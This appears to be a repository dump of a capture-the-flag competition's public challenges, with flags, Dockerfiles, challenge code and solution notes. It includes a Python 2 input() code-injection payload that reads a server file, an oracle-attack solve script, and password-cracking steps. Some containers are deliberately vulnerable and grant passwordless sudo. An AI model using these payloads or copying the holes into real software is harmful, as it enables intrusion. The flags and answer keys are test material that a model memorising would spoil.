/srv/app/run.py\"" ] 14 | # docker build -t ecdsa_jail -------------------------------------------------------------------------------- /Challenges/Crypto/ecdsa_jail/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{CVE-2022-21449_psYch1c_sigNatur3s!} -------------------------------------------------------------------------------- /Challenges/Crypto/gggg/challenge.yml: -------------------------------------------------------------------------------- 1 | name: gggg 2 | author: warri 3 | category: crypto 4 | description: | 5 | > So many gs...what even is going on...some twisted sort of RSA perhaps? 6 | 7 | flags: 8 | - blahaj{gr0ups?_iT5_alL_aBout_tH3_cYCL35!} -------------------------------------------------------------------------------- /Challenges/Crypto/gggg/dist/chall.py: -------------------------------------------------------------------------------- 1 | from sage.all import SymmetricGroup, PermutationGroup, random_prime, save 2 | from Crypto.Cipher import AES 3 | from Crypto.Util.Padding import pad 4 | from hashlib import sha256 5 | from SECRET import flag 6 | 7 | gk = random_prime(2**64, 2**65) 8 | g = 2**4 * 5**5 9 | G = SymmetricGroup(g) 10 | gp, gq = G.random_element(), G.random_element() 11 | gn = gp * gq 12 | ge = 0x10001 13 | GG = PermutationGroup([gp, gq]) 14 | gm = GG.random_element() 15 | gc = (gm**gk)**ge 16 | gi = [G.identity()(i) for i in range(g+1)] 17 | 18 | GN = [gn(i) for i in gi[1:]] 19 | GM = [gm(i) for i in GN] 20 | GC = [gc(i) for i in GN] 21 | 22 | enc = AES.new(sha256(str(gk).encode()).digest()[:16], AES.MODE_ECB).encrypt(pad(flag,16)).hex() 23 | 24 | out = {"GN":gn, "GM":gm, "GC":gc, "enc":enc} 25 | save(out, "out.sobj") -------------------------------------------------------------------------------- /Challenges/Crypto/gggg/dist/out.sobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Crypto/gggg/dist/out.sobj -------------------------------------------------------------------------------- /Challenges/Crypto/long2bytes/challenge.yml: -------------------------------------------------------------------------------- 1 | name: long2bytes 2 | author: warri 3 | category: crypto 4 | description: It is almost an universal fact that every cryptographer's journey starts with them figuring out how to convert from bytes to integers and vice versa. But what about floats? 5 | 6 | flags: 7 | - blahaj{h3l1o_l4tt1ce_my_0ld_fren} -------------------------------------------------------------------------------- /Challenges/Crypto/otp/challenge.yml: -------------------------------------------------------------------------------- 1 | name: One time pad 2 | author: fern 3 | category: crypto 4 | description: Ever heard of the One-time pad? Surely, you cannot crack this scheme! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{uNusU4L_InF0_l3AK} 13 | 14 | files: 15 | - dist/chal.py 16 | 17 | connection_info: nc hostname 8000 18 | 19 | state: visible 20 | version: "0.1" 21 | -------------------------------------------------------------------------------- /Challenges/Crypto/otp/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Realize that the encrypted result can be any character EXCEPT for the flag. From there you can just make requests (typically takes ~1024 - 2048 tries to obtain, a reasonable amount) for encrypted flag, until each character of the flag has been narrowed down to only a single char. See `solve/` for solvescript. -------------------------------------------------------------------------------- /Challenges/Crypto/otp/solve/soln.py: -------------------------------------------------------------------------------- 1 | import base64, string 2 | from pwn import * 3 | p = remote("localhost", 8000) 4 | r = [] 5 | for x in range(2000): 6 | p.sendlineafter(b"Command:", b"getflag") 7 | p.recvuntil(b"is: ") 8 | a = p.recvline().strip().decode() 9 | r.append(a) 10 | print(a, x) 11 | p.close() 12 | 13 | keys = [] 14 | for x in r: 15 | keys.append(base64.b64decode(x.encode()).decode("charmap")) 16 | 17 | for x in range(len(keys[0])): 18 | used = list(set([(ord(a[x])) for a in keys])) 19 | a = [i for i in range(256) if i not in used and (i > 31 and i < 127)] 20 | if len(a) == 1: 21 | print(chr(a[0]), end = "") 22 | else: 23 | print([chr(b) for b in a]) -------------------------------------------------------------------------------- /Challenges/Crypto/otp/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.8-alpine 3 | 4 | RUN apk update && apk add socat 5 | 6 | COPY ./chal.py /srv/app/run.py 7 | COPY ./entry.sh /srv/app/entry.sh 8 | RUN chmod 555 /srv/app/run.py 9 | RUN chmod 555 /srv/app/entry.sh 10 | 11 | RUN adduser --uid 1001 --disabled-password nonroot 12 | USER 1001 13 | 14 | WORKDIR /srv/app 15 | 16 | CMD [ "/srv/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Crypto/otp/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | otp: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Crypto/otp/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m python3 /srv/app/run.py" -------------------------------------------------------------------------------- /Challenges/Crypto/pascal/challenge.yml: -------------------------------------------------------------------------------- 1 | name: pascal 2 | author: warri 3 | category: crypto 4 | description: RSA is so old school. Can you defeat this cryptosystem which had appeared in DEFCON quals 2024? 5 | 6 | flags: 7 | - blahaj{pal1i3r?_i_b4rely_kn0w_h3r!} 8 | -------------------------------------------------------------------------------- /Challenges/Crypto/pascal/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{pal1i3r?_i_b4rely_kn0w_h3r!} -------------------------------------------------------------------------------- /Challenges/Crypto/ycloLC/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.10-alpine 3 | 4 | RUN apk update && apk add socat 5 | 6 | RUN pip install pycryptodome 7 | 8 | COPY ./chal.py /srv/app/run.py 9 | RUN chmod 555 /srv/app/run.py 10 | 11 | WORKDIR /srv/app 12 | 13 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python3.10 -u /srv/app/run.py\"" ] -------------------------------------------------------------------------------- /Challenges/Crypto/ycloLC/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | yclolc: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Christmas Wi(sh)list 2 | author: samuzora 3 | category: pwn 4 | description: All I want for Christmas is /bin/sh 5 | 6 | flags: 7 | - blahaj{i_h3ar_th0se_sl3igh_sh3lls_r1nging} -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/dist/santa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/dist/santa -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/sol/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/sol/libc.so.6 -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/sol/santa_patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/sol/santa_patched -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | COPY ./flag.txt /srv/app/flag.txt 4 | ADD ./santa /srv/app/run 5 | 6 | RUN chmod 444 /srv/app/flag.txt 7 | RUN chmod +x /srv/app/run 8 | 9 | RUN apt-get update && apt-get install -y socat 10 | 11 | RUN addgroup --gid 1001 nonroot && \ 12 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 13 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 14 | USER 1001 15 | 16 | WORKDIR /srv/app 17 | 18 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m /srv/app/run\"" ] 19 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | 3 | services: 4 | christmas: 5 | build: ./ 6 | privileged: false 7 | ports: 8 | - "8000:8000" 9 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{i_h3ar_th0se_sl3igh_sh3lls_r1nging} 2 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Executable Challenge/christmas/src/santa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/EXAMPLES/Executable Challenge/christmas/src/santa -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Printwriter -1 2 | author: azazo 3 | category: misc 4 | description: | 5 | I'm not very good at C, so I coded this challenge in Python. Don't have Python 3 yet though, so it's a bit slow... At least it can't be pwned now! 6 | 7 | 8 | flags: 9 | - blahaj{0uT_w17h_th3_N3W_4Nd_1N_w1tH_the_Old} -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/dist/main.py: -------------------------------------------------------------------------------- 1 | import random, time 2 | 3 | while True: 4 | time.sleep(1) 5 | try: 6 | s = raw_input("Print what? ") 7 | i = int(input("How many times? ")) 8 | for round in xrange(i): 9 | print(s) 10 | except Exception as e: 11 | print("Something bad happened :(") 12 | print(e) 13 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/sol/solution.md: -------------------------------------------------------------------------------- 1 | Python 2 does this silly thing where it evaluates the user input from input(), leading to the user being able to execute arbitrary code. 2 | 3 | Intended solution path: 4 | 1. Notice that Python 2 is being used 5 | 2. Input random stuff and notice that whatever entered for number of times is evaluated 6 | 3. `__import__("os").popen("cat flag.txt").read()` to get flag 7 | 8 | Flag: `blahaj{0uT_w17h_th3_N3W_4Nd_1N_w1tH_the_Old}` 9 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu 2 | 3 | COPY ./main.py /srv/app/run 4 | COPY ./flag.txt /srv/app/flag.txt 5 | 6 | RUN chmod +x /srv/app/run 7 | 8 | RUN apt-get update && apt-get install -y socat && apt-get install -y python2.7 9 | 10 | RUN addgroup --gid 1001 nonroot && \ 11 | adduser --uid 1001 --gid 1001 --disabled-password --gecos "" nonroot && \ 12 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 13 | USER 1001 14 | 15 | WORKDIR /srv/app 16 | 17 | CMD [ "socat", "TCP-LISTEN:8000,nodelay,reuseaddr,fork", "EXEC:\"timeout -s KILL 10m python2.7 -u /srv/app/run\"" ] -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{0uT_w17h_th3_N3W_4Nd_1N_w1tH_the_Old} 2 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Interactive Challenge/Printwriter -1/src/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/local/bin/python 2 | 3 | while True: 4 | try: 5 | s = raw_input("Print what? ") 6 | i = int(input("How many times? ")) 7 | for round in xrange(i): 8 | print(s) 9 | except Exception as e: 10 | print("Something bad happened :(") 11 | print(e) 12 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/challenge.yml: -------------------------------------------------------------------------------- 1 | name: eXample Sending Service 2 | author: Halogen 3 | category: web 4 | description: | 5 | > As part of Halogen's cybersecurity exam, Blahaj has to get the flag only accessible by the administrator. But Blahaj cannot even type with his flippers, help him pass! 6 | 7 | # The flag to use 8 | flags: 9 | - blahaj{d1d_y0u_f0rg0r_t0_upd4t3?} -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/dist/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM zenika/alpine-chrome:with-puppeteer 2 | 3 | RUN mkdir app 4 | WORKDIR app 5 | COPY . . 6 | RUN npm ci 7 | 8 | EXPOSE 3000 9 | CMD ["node","app.js"] -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/dist/flag.txt: -------------------------------------------------------------------------------- 1 | SAMPLE FLAG -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/dist/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "printwriter-3", 3 | "version": "1.0.0", 4 | "description": "PrintWriter :/", 5 | "main": "main.js", 6 | "scripts": { 7 | "test": "echo \\\"Error: no test specified\\\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "dompurify": "^2.0.16", 13 | "ejs": "^3.1.9", 14 | "express": "^4.18.2", 15 | "express-jwt": "^8.4.1", 16 | "jsdom": "^22.1.0", 17 | "jsonwebtoken": "^9.0.2", 18 | "puppeteer": "^21.3.8" 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM zenika/alpine-chrome:with-puppeteer 2 | 3 | RUN mkdir app 4 | WORKDIR app 5 | COPY . . 6 | RUN npm ci 7 | EXPOSE 8000 8 | USER root 9 | RUN addgroup --gid 1001 nonroot && \ 10 | adduser --uid 1001 -G nonroot --disabled-password --gecos "" nonroot && \ 11 | echo 'nonroot ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers 12 | USER 1001 13 | CMD ["node","app.js"] -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{d1d_y0u_f0rg0r_t0_upd4t3?} -------------------------------------------------------------------------------- /Challenges/EXAMPLES/Server Challenge/eXample Sending Service/src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "printwriter-3", 3 | "version": "1.0.0", 4 | "description": "PrintWriter :/", 5 | "main": "main.js", 6 | "scripts": { 7 | "test": "echo \\\"Error: no test specified\\\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "dompurify": "^2.0.16", 13 | "ejs": "^3.1.9", 14 | "express": "^4.18.2", 15 | "express-jwt": "^8.4.1", 16 | "jsdom": "^22.1.0", 17 | "jsonwebtoken": "^9.0.2", 18 | "puppeteer": "^21.3.8" 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Challenges/Forensics/README.md: -------------------------------------------------------------------------------- 1 | Forensics Challenges -------------------------------------------------------------------------------- /Challenges/Forensics/audiofile/dist/chal.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/audiofile/dist/chal.wav -------------------------------------------------------------------------------- /Challenges/Forensics/audiofile/solution.md: -------------------------------------------------------------------------------- 1 | Open in spectrogram, and view the flag. 2 | 3 | Flag: `blahaj{h1Dd3N_In_AuD10}` -------------------------------------------------------------------------------- /Challenges/Forensics/bigzip/dist/chal.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/bigzip/dist/chal.zip -------------------------------------------------------------------------------- /Challenges/Forensics/bigzip/solution.md: -------------------------------------------------------------------------------- 1 | Intended solve: 2 | Most of the zip files are stored in STORE algo, which makes things very easy as you can just blast away the layers. I did it 10000 STOREs for each DEFLATE. Script in `solve`. Script runs in <1 min on my (quite potato) machine. 3 | 4 | Funny solve: 5 | Write script to actually unzip each later with `7z` in a loop. I actually calculated this will take minimum 40h when making the chal, making it unusable. 6 | 7 | Flag: `blahaj{z1p5_AlL_tH3_W4Y}` -------------------------------------------------------------------------------- /Challenges/Forensics/bigzip/solution/soln.py: -------------------------------------------------------------------------------- 1 | import zipfile 2 | import io 3 | 4 | with open("r.zip", "rb") as f: 5 | file_bytes = f.read() 6 | while True: 7 | if file_bytes.startswith(b"PK\x03\x04\x14\x00\x00\x00\x08\x00"): #hunt for deflates 8 | zfile = zipfile.ZipFile(io.BytesIO(file_bytes), "r") 9 | print(zfile.infolist(), len(file_bytes)) 10 | file_bytes = zfile.read(zfile.infolist()[0]) 11 | else: 12 | file_bytes2 = file_bytes[35000:][:-73000] #blast away stores 1000 at a time 13 | if len(file_bytes2) == 0: #we found the flag, hit the end of the chain 14 | zfile = zipfile.ZipFile(io.BytesIO(file_bytes), "r") 15 | print(zfile.infolist(), len(file_bytes)) 16 | file_bytes = zfile.read(zfile.infolist()[0]) 17 | print("FLAG:", file_bytes) 18 | break 19 | file_bytes = file_bytes2 -------------------------------------------------------------------------------- /Challenges/Forensics/corruptedimage/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "corrupted image" 2 | author: "scuffed" 3 | category: forensics 4 | description: My friend sent me an artwork he made but the file seems to be corrupted :( Please fix it for me... 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{F4K3_1M6} 13 | 14 | files: 15 | - dist/fix_me.jpg 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/corruptedimage/dist/fix_me.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/corruptedimage/dist/fix_me.jpg -------------------------------------------------------------------------------- /Challenges/Forensics/corruptedimage/solution.md: -------------------------------------------------------------------------------- 1 | Identify that it's a PNG and not JPG, then fix the magic bytes 2 | Flag: `blahaj{F4K3_1M6}` -------------------------------------------------------------------------------- /Challenges/Forensics/corruptedimage/solution/untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/corruptedimage/solution/untitled.png -------------------------------------------------------------------------------- /Challenges/Forensics/dataexpunged/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "[DATA EXPUNGED]" 2 | author: "scuffed" 3 | category: forensics 4 | description: A recent breach of the Subliminal Undetectable Systems Institute (SUS Institute) has led to gigabytes of top secret documents being leaked online! However, some of these documents remain redacted... help unveil the secrets that the SUS Institute are trying to hide! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{not_so_private_nor_confidential} 13 | 14 | files: 15 | - dist/exfiltrated.pdf 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/dataexpunged/dist/exfiltrated.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/dataexpunged/dist/exfiltrated.pdf -------------------------------------------------------------------------------- /Challenges/Forensics/dataexpunged/solution.md: -------------------------------------------------------------------------------- 1 | Either extract all images from the PDF or just delete the black rectangles in some PDF editor. 2 | 3 | Flag: `blahaj{not_so_private_nor_confidential}` -------------------------------------------------------------------------------- /Challenges/Forensics/imetthedata/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "i met the data" 2 | author: "scuffed" 3 | category: forensics 4 | description: Look, if you had one shot or one opportunity. To store some data in an image in one moment. Would you capture it or just let it slip? Yo. His palms are sweaty, knees weak, arms are heavy. There's vomit on his sweater already, mom's spaghetti. 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{i_can_rhyme_orange_with_banana} 13 | 14 | files: 15 | - dist/flag.jpg 16 | 17 | state: visible 18 | 19 | version: "0.1" 20 | -------------------------------------------------------------------------------- /Challenges/Forensics/imetthedata/dist/flag.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/imetthedata/dist/flag.jpg -------------------------------------------------------------------------------- /Challenges/Forensics/imetthedata/solution.md: -------------------------------------------------------------------------------- 1 | exiftool all parts of the flag 2 | 3 | Flag: `blahaj{i_can_rhyme_orange_with_banana}` -------------------------------------------------------------------------------- /Challenges/Forensics/keylogger/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "keylogger" 2 | author: "scuffed" 3 | category: forensics 4 | description: "I've decided to install a keylogger on my friend's computer to find out some of his secrets! However, I don't know how to read the output of the keylogger??" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{stop_reading_my_messages} 13 | 14 | files: 15 | - dist/log.pcapng 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/keylogger/dist/log.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/keylogger/dist/log.pcapng -------------------------------------------------------------------------------- /Challenges/Forensics/keylogger/solution.md: -------------------------------------------------------------------------------- 1 | - Find the SSLKEYLOGFILE with FTK imager to be able to decode TLS from pcap 2 | - Get the zip file from the pcap 3 | - Hashcat the password 4 | 5 | Flag: `blahaj{why_was_that_envvar_set}` -------------------------------------------------------------------------------- /Challenges/Forensics/memory/solution.md: -------------------------------------------------------------------------------- 1 | commands to run to solve: 2 | - .\vol2.exe -f .\dmp.raw imageinfo to get the profile 3 | - .\vol2.exe -f .\dmp.raw --profile Win7SP1x86_23418 pslist to get the process 4 | - .\vol2.exe -f .\dmp.raw --profile Win7SP1x86_23418 consoles to get the command 5 | - .\vol2.exe -f .\dmp.raw --profile Win7SP1x86_23418 printkey -K "ControlSet001\Control\ComputerName\ComputerName" to get the computer name 6 | 7 | Flag: `blahaj{M3M0R1ESDUMP3DM3M0R1ESR34D}` -------------------------------------------------------------------------------- /Challenges/Forensics/significantbites/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "significant bites" 2 | author: "scuffed" 3 | category: forensics 4 | description: My friend sent me this photo of an apple that she took a few bites out of. Doesn't it look cool? On top of that, she says that she's hidden a message in this photo somehow... 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{1_W4N73D_70_S33_73H_w0rLD_1N_c0L0R} 13 | 14 | files: 15 | - dist/bad_apple.PNG 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/significantbites/dist/bad_apple.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/significantbites/dist/bad_apple.PNG -------------------------------------------------------------------------------- /Challenges/Forensics/significantbites/solution.md: -------------------------------------------------------------------------------- 1 | LSB, probably solvable with AperiSolve. 2 | 3 | Flag: `blahaj{1_W4N73D_70_S33_73H_w0rLD_1N_c0L0R}` -------------------------------------------------------------------------------- /Challenges/Forensics/trashcanstroll/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Trashcan Stroll" 2 | author: "scuffed" 3 | category: forensics 4 | description: Behold, a suspiciously large JPG file! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{RubbI5h_on_Th3_MoV3} 13 | 14 | files: 15 | - dist/silly.jpg 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/trashcanstroll/dist/silly.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Forensics/trashcanstroll/dist/silly.jpg -------------------------------------------------------------------------------- /Challenges/Forensics/trashcanstroll/solution.md: -------------------------------------------------------------------------------- 1 | binwalk oneshot 2 | 3 | Flag: `blahaj{RubbI5h_on_Th3_MoV3}` -------------------------------------------------------------------------------- /Challenges/Forensics/wireshonk/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "wireshonk" 2 | author: "scuffed" 3 | category: forensics 4 | description: "Keylogging isn't enough for me! I've decided to create a whole forensic dump of my friend's computer in hopes of extracting a super secret design that he received. From what I've heard, the design is even password protected with some super secret 6 digit code...\n\nLink to forensic dump: challenge here: https://drive.google.com/drive/folders/1Kyd216ASWkK-XY96IZeOaac7ZH7NK1Uy?usp=sharing\n\n Mirror link (if the above isn't working): https://drive.google.com/drive/folders/1RYyXWeSSbS_EjWrq43vuE00DN6JoWYHr?usp=sharing" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{why_was_that_envvar_set} 13 | 14 | state: visible 15 | 16 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Forensics/wireshonk/solution.md: -------------------------------------------------------------------------------- 1 | - Find the SSLKEYLOGFILE with FTK imager to be able to decode TLS from pcap 2 | - Get the zip file from the pcap 3 | - Hashcat the password 4 | 5 | Flag: `blahaj{why_was_that_envvar_set}` -------------------------------------------------------------------------------- /Challenges/Misc/1110101111011010/challenege.yml: -------------------------------------------------------------------------------- 1 | name: 1110101111011010 2 | author: FS 3 | category: misc 4 | description: | 5 | > beeeep beeeep beeeep beep beeeep beep beeeep beeeep beeeep beeeep beep beeeep beeeep beep beeeep beep. (Take note that sample rate of audio is 44.1kHz and duration of each beep is 0.01s) 6 | 7 | flags: 8 | - blahaj{On3s_aNd_z3ros_mAk3_tH3_wHole_w0rLd_rUN_aRouNd} 9 | -------------------------------------------------------------------------------- /Challenges/Misc/1110101111011010/dist/secret.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/1110101111011010/dist/secret.wav -------------------------------------------------------------------------------- /Challenges/Misc/1110101111011010/sol.md: -------------------------------------------------------------------------------- 1 | placeholder 2 | -------------------------------------------------------------------------------- /Challenges/Misc/1110101111011010/solve/solve.py: -------------------------------------------------------------------------------- 1 | from scipy.io.wavfile import read 2 | import numpy as np 3 | 4 | def read_audio(file): 5 | sample_rate,data=read(file) 6 | return sample_rate,data 7 | 8 | def calc_freq(signal_chunk,sample_rate): 9 | zero_crossing=np.where(np.diff(np.signbit(signal_chunk)))[0] 10 | num_crossing=len(zero_crossing) 11 | duration=len(signal_chunk)/sample_rate 12 | estimated_freq=num_crossing/(2*duration) 13 | return estimated_freq 14 | 15 | sample_rate,modulated_wave=read_audio("hidden.wav") 16 | sample_rate=44100 17 | duration=0.01 18 | 19 | bits="" 20 | 21 | for i in range(0,len(modulated_wave),int(sample_rate*duration)): 22 | chunk=modulated_wave[i:i+441] 23 | detected_freq=calc_freq(chunk,sample_rate) 24 | if (detected_freq==float(950)): 25 | bits+="1" 26 | else: 27 | bits+="0" 28 | 29 | data=''.join([chr(int(bits[i:i+8],2)) for i in range(0,len(bits),8)]) 30 | print(data) -------------------------------------------------------------------------------- /Challenges/Misc/README.md: -------------------------------------------------------------------------------- 1 | Misc Challenges -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Shikanokonokonoko 2 | author: hartmannsyg 3 | category: misc 4 | description: I almost went insane testing this. しかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたんしかのこのこのここしたんたん. 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{my_d33r_Fr13nd_N0k0tAn} 13 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.js 7 | .yarn/install-state.gz 8 | 9 | # testing 10 | /coverage 11 | 12 | # next.js 13 | /.next/ 14 | /out/ 15 | 16 | # production 17 | /build 18 | 19 | # misc 20 | .DS_Store 21 | *.pem 22 | 23 | # debug 24 | npm-debug.log* 25 | yarn-debug.log* 26 | yarn-error.log* 27 | 28 | # local env files 29 | .env*.local 30 | 31 | # vercel 32 | .vercel 33 | 34 | # typescript 35 | *.tsbuildinfo 36 | next-env.d.ts 37 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/README.md: -------------------------------------------------------------------------------- 1 | # Shikanoko but it's a Markov chain 2 | 3 | This was forked from https://github.com/nyraa/shikanoko-markov-chain -------------------------------------------------------------------------------- 